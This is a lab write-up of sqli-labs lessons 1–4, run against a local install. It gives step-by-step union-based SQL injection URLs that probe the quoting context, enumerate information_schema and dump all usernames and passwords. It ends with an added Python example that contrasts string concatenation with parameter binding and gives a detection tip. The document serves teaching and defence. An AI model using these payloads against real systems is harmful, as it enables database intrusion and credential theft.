sqlilabs Less-1~Less-4 writeup


Time to start studying injection systematically!

Less-1


As the hint suggests, test the id parameter:

http://localhost/sqli-labs-master/Less-1/?id=1'

The page returns an error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

Note the extra ' after LIMIT 0,1, so construct the following statement to guess the number of columns:

http://localhost/sqli-labs-master/Less-1/?id=1' order by 3%23

Testing the fourth column shows Unknown column '4' in 'order clause', so there are only three columns. Next, find which columns are displayed:

http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,3%23

Columns 2 and 3 are the ones displayed, so test for the database name:

http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,database(),3%23

The database name is security; hex-encode it as 7365637572697479 and dump the tables:

http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23

The table names are: emails, referers, uagents, users. Next, dump the columns; the users table is used here, hex-encoded as 7573657273:

http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273%23

OK, the column names are out: id, username, password. Now fetch the data:

http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(username,0x3a,password),3 from users%23

This retrieves every account and password.

Less-2


Test the SQL by adding a single quote; the test succeeds, so start injecting. Test the column count:

http://localhost/sqli-labs-master/Less-2/?id=1 order by 3%23

As above, there are only three columns. Next, find the displayed columns:

http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,3%23

The displayed columns are 2 and 3; now query the database name:

http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,database(),3%23

Hmm, the database is still security, so the remaining steps are the same as above: dump the tables, dump the columns, fetch the data.

http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(username,0x3a,password),3 from users%23

OK, all accounts and passwords obtained.

Less-3


First, test for SQL injection as before, starting with a single quote. This time it is a bit more interesting; the error reads:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1

So this time the parameter is closed by a parenthesis as well as a single quote. Test the column count as follows:

http://localhost/sqli-labs-master/Less-3/?id=1') order by 3%23

Once the concatenation characters are found, the steps are the same as in Less-1. The final payload that fetches all the data:

http://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,group_concat(username,0x3a,password),3 from users%23

Less-4


This round of testing shows that adding a single quote leaves the page displaying normally, but adding a double quote produces an error message:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1

So close the parameter with "), the column count test works, OK, and then repeat the Less-1 process...

http://localhost/sqli-labs-master/Less-4/?id=-1") union select 1,group_concat(username,0x3a,password),3 from users%23
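The common thread in all four lessons is that the id parameter is pasted straight into the SQL text, and the database error message echoes back the part of the statement that follows the input (' LIMIT 0,1, ') LIMIT 0,1, ") LIMIT 0,1), which is exactly how each lesson's quoting context is recognised. (%23 in the URLs is the URL-encoded # that starts a MySQL comment, and 0x3a is the hex for the ':' separator.) The following Python is an added example, not code from the writeup or from sqli-labs itself: it models the four quoting contexts with constructed SQLite templates (hypothetical names TEMPLATES, PROBES, build_unsafe, unsafe_lookup, run_probes, safe_lookup_by_id, safe_lookup_by_name), shows that the same single-character probes the writeup uses turn into syntax errors when the query is built by concatenation, and contrasts that with parameter binding, where the quote characters travel as data. The MySQL-only pieces (the # comment terminator, union select against information_schema) are not reproduced; SQLite is used only because it runs offline.

```python
import sqlite3

# Constructed stand-in for the four lab queries. The real sqli-labs code is PHP
# against MySQL; these SQLite templates (hypothetical) only reproduce how each
# lesson wraps the id parameter before concatenating it into the statement.
TEMPLATES = {
    "Less-1": "SELECT id, username FROM users WHERE id='{id}' LIMIT 0,1",
    "Less-2": "SELECT id, username FROM users WHERE id={id} LIMIT 0,1",
    "Less-3": "SELECT id, username FROM users WHERE id=('{id}') LIMIT 0,1",
    "Less-4": 'SELECT id, username FROM users WHERE id=("{id}") LIMIT 0,1',
}

# The probe the writeup sends to each lesson: one stray quote of the right kind.
PROBES = {"Less-1": "1'", "Less-2": "1'", "Less-3": "1'", "Less-4": '1"'}


def make_db() -> sqlite3.Connection:
    """In-memory users table with constructed sample rows (not the lab's data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "s3cret"), (2, "bob", "hunter2")])
    return conn


def build_unsafe(lesson: str, user_id: str) -> str:
    """Concatenate the raw parameter into the template, as the vulnerable code does."""
    return TEMPLATES[lesson].format(id=user_id)


def unsafe_lookup(conn: sqlite3.Connection, lesson: str, user_id: str) -> tuple:
    """Run the concatenated query. Returns ('row', row), ('none', None) or ('error', msg).

    The error text is what an attacker reads to learn the quoting context;
    on the MySQL side it is the "near '...' at line 1" message from the writeup.
    """
    sql = build_unsafe(lesson, user_id)
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))
    return ("row", row) if row else ("none", None)


def run_probes() -> dict:
    """Send each lesson its probe and record whether the concatenated query broke."""
    conn = make_db()
    return {lesson: unsafe_lookup(conn, lesson, probe)[0] for lesson, probe in PROBES.items()}


def safe_lookup_by_id(conn: sqlite3.Connection, user_id: str):
    """Hardened form: validate the type, then bind the value instead of concatenating."""
    try:
        id_value = int(user_id)  # the id is an integer; reject anything else up front
    except ValueError:
        return None
    return conn.execute("SELECT id, username FROM users WHERE id=? LIMIT 1", (id_value,)).fetchone()


def safe_lookup_by_name(conn: sqlite3.Connection, username: str):
    """Parameter binding on a text column: quote characters are compared as data, never parsed."""
    return conn.execute("SELECT id, username FROM users WHERE username=? LIMIT 1", (username,)).fetchone()


if __name__ == "__main__":
    db = make_db()
    for name, probe in PROBES.items():
        print(name, repr(build_unsafe(name, probe)), "->", unsafe_lookup(db, name, probe))
    print("safe id 1   ->", safe_lookup_by_id(db, "1"))
    print("safe id 1'  ->", safe_lookup_by_id(db, "1'"))
    print("safe alice' ->", safe_lookup_by_name(db, "alice'"))
```

Running it shows every lesson's probe ending in a syntax error from the unsafe path, while the bound-parameter lookups simply return no row for the same inputs. For detection, the takeaway is the same one the writeup exploits: a database syntax error that reaches the HTTP response is a strong signal that raw input is being concatenated into SQL, so application logs that record such errors per request are worth alerting on.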